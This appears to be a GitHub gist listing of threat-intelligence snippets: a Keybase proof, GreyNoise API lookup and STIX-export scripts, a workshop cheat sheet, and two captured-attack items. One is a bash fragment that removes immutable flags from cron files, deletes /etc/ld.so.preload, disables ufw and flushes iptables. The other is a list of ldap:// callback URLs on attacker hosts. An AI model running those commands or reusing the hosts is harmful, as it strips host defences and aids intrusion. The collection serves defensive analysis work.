I hereby claim:
- I am superducktoes on github.
- I am superducktoes (https://keybase.io/superducktoes) on keybase.
- I have a public key whose fingerprint is B2C5 91D5 AF7C C0B6 F068 7567 0517 E3C4 ED54 7340
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
# NOTE(review): only the opening lines of this script are visible here. Apart
# from the ulimit call, every command below loosens a host protection
# (immutable flags, the preload file, the firewall), so it reads like a
# captured hostile sample rather than an admin script - confirm provenance
# and do not run it on a host you care about.
#
# Raise the open-file-descriptor limit for this shell and what it starts.
ulimit -n 65535 | |
# Clear the immutable attribute on /etc/ld.so.preload, then delete the file.
# That file lists libraries the dynamic linker loads into every dynamically
# linked process, so unexpected changes to it are worth alerting on.
chattr -i /etc/ld.so.preload | |
rm -f /etc/ld.so.preload | |
# Clear the immutable attribute on the cron spool (recursively) and on
# /etc/crontab, which makes both writable again.
chattr -R -i /var/spool/cron | |
chattr -i /etc/crontab | |
# Turn off the ufw firewall front end, then flush every rule in the default
# iptables table; after this the host filters no traffic.
ufw disable | |
iptables -F |
ldap://e2216d7a9a31.bingsearchlib.com:39356/a | |
ldap://612877d3a59b.bingsearchlib.com:39356/a | |
ldap://205.185.115.217:47324/a | |
ldap://ab3419ba1f45.bingsearchlib.com:39356/a | |
ldap://193.3.19.159:53/c | |
ldap://ea62856c5fc3.bingsearchlib.com:39356/a | |
ldap://43065f484327.bingsearchlib.com:39356/a | |
ldap://5486b6edd688.bingsearchlib.com:39356/a | |
ldap://92d27039ede4.bingsearchlib.com:39356/a | |
ldap://45cecd2f38ca.bingsearchlib.com:39356/a |
import fileinput | |
import re | |
from greynoise import GreyNoise | |
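import os

# command usage: cat <file_ips>.txt | python3 file_ips_lookup.py
#
# The API key is taken from the GREYNOISE_API_KEY environment variable so a
# live key never has to be pasted into (and published with) this file. When
# the variable is unset the key stays empty, as in the original script.
api_client = GreyNoise(api_key=os.environ.get("GREYNOISE_API_KEY", ""))

# Collects the IP addresses found in the piped-in file.
ip_list = []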
# parse file for ips |
{ | |
"type": "bundle", | |
"id": "bundle--156aade4-a0b9-4931-aef7-f400b2ffd1d7", | |
"objects": [ | |
{ | |
"type": "indicator", | |
"spec_version": "2.1", | |
"id": "indicator--7f7cfee6-7cb4-4d8f-8012-bc5959a53564", | |
"created": "2022-05-19T20:10:17.632149Z", | |
"modified": "2022-05-19T20:10:17.632149Z", |
from greynoise import GreyNoise | |
import json | |
import csv | |
import argparse | |
import os | |
from stix2 import MemoryStore, Indicator | |
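# The API key is taken from the GREYNOISE_API_KEY environment variable so a
# live key never has to be pasted into (and published with) this file. When
# the variable is unset the key stays empty, as in the original script.
api_client = GreyNoise(api_key=os.environ.get("GREYNOISE_API_KEY", ""))

# Command-line parser; its arguments are defined further down the script.
parser = argparse.ArgumentParser()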
import requests | |
import json | |
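import os

# The API key is taken from the GREYNOISE_API_KEY environment variable so a
# live key never has to be pasted into (and published with) this file. When
# the variable is unset the key stays empty, as in the original script.
GN_API_KEY = os.environ.get("GREYNOISE_API_KEY", "")

# GNQL query string sent to the endpoint below.
GN_QUERY = "last_seen:1d classification:malicious"
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"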
HEADERS = { | |
"accept": "application/json", |
Stop Chasing Ghosts: California Roadshow | |
Cheat Sheet | |
You’re working at a sticker company called “Milk Co.” One of your developers has left a vulnerable dev environment exposed to the internet. Workshop participants play the role of the Security Analyst at “Milk Co.”: they investigate the alert to understand what happened, decide how to stop additional attacks quickly, and then dig further into indicators that can be used for hunting.
Question Answer Form | |
https://stopchasingghosts.typeform.com/to/JWKos6K2 | |
[Optional] Slack Channel: Join GreyNoise Community Slack and find channel #roadshow-dc |
import requests | |
import sys | |
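import os

# The API key is taken from the GREYNOISE_API_KEY environment variable so a
# live key never has to be pasted into (and published with) this file. When
# the variable is unset the key stays empty, as in the original script.
api_key = os.environ.get("GREYNOISE_API_KEY", "")
limit = 10  # can change for more

# The IP to look up is the first command-line argument. sys.exit() with a
# string writes the message to stderr and exits with status 1, so a missing
# argument is visible to calling scripts; quit() is meant for interactive
# sessions and exits with status 0.
if len(sys.argv) < 2:
    sys.exit("need an IP")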
headers = { |
import matplotlib.pyplot as plt | |
import numpy as np | |
import requests | |
import json | |
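import os

# The API key is taken from the GREYNOISE_API_KEY environment variable so a
# live key never has to be pasted into (and published with) this file. When
# the variable is unset the key stays empty, as in the original script.
GN_API_KEY = os.environ.get("GREYNOISE_API_KEY", "")

# GNQL query string sent to the endpoint below.
GN_QUERY = 'jira last_seen:30d'
GN_QUERY_URL = "https://api.greynoise.io/v2/experimental/gnql"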
HEADERS = { |